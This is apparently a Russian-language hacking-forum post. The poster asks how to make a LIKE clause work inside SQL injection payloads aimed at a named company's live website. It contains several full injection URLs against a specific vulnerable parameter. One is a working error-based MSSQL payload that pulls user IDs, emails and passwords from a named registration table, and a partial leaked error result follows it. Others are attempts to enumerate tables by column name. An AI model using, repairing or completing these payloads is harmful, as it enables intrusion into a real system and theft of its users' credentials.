Всем привет! подскажите кто знает как правильно составить запрос чтоб работал оператор LIKE в запросе я хочу чтоб запрос вывел мне таблицу в которой есть интересующие меня колонки например email pass и т.д как получить структуру, колонки и содержимое таблиц я знаю но вот с LIKE у меня не получается не могу понять почему чтобы было понятнее я хочу рассмотреть на примере HTML: http://www.piaggio.com/info.asp?BR=GILERA&CD=' есть инъекция HTML: http://www.piaggio.com/info.asp?BR=GILERA&CD=1%27)%20or%201%3D(select%20top%201%20%2Bcast(userid%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(email%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(userpassword%20as%20nvarchar)%20from%20Piaggio..tbSSORegistration%20where%20userid%3E1)-- Conversion failed when converting the nvarchar value '[email protected].~???......................' to data type int. в базе Piaggio есть таблица tbSSORegistration и есть колонки email и userpassword пробую через LIKE вывести имя таблицы в которой есть колонка email HTML: http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT sysobjects.name as tablename,syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE 'email' )-- выводит Only one expression can be specified in the select list when the subquery is not introduced with EXISTS. пробовал указать базу HTML: http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT Piaggio..sysobjects.name as tablename,Piaggio..syscolumns.name as columnname FROM Piaggio..sysobjects JOIN Piaggio..syscolumns ON Piaggio..sysobjects.id = Piaggio..syscolumns.id WHERE sysobjects.xtype = 'U' AND Piaggio..syscolumns.name LIKE 'email' )-- пробовал и так HTML: http://www.piaggio.com/info.asp?BR=GILERA&CD=')%20or%201=(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20like%20'%25email%25')-- подскажите плз кто знает как правильно запрос составить с LIKE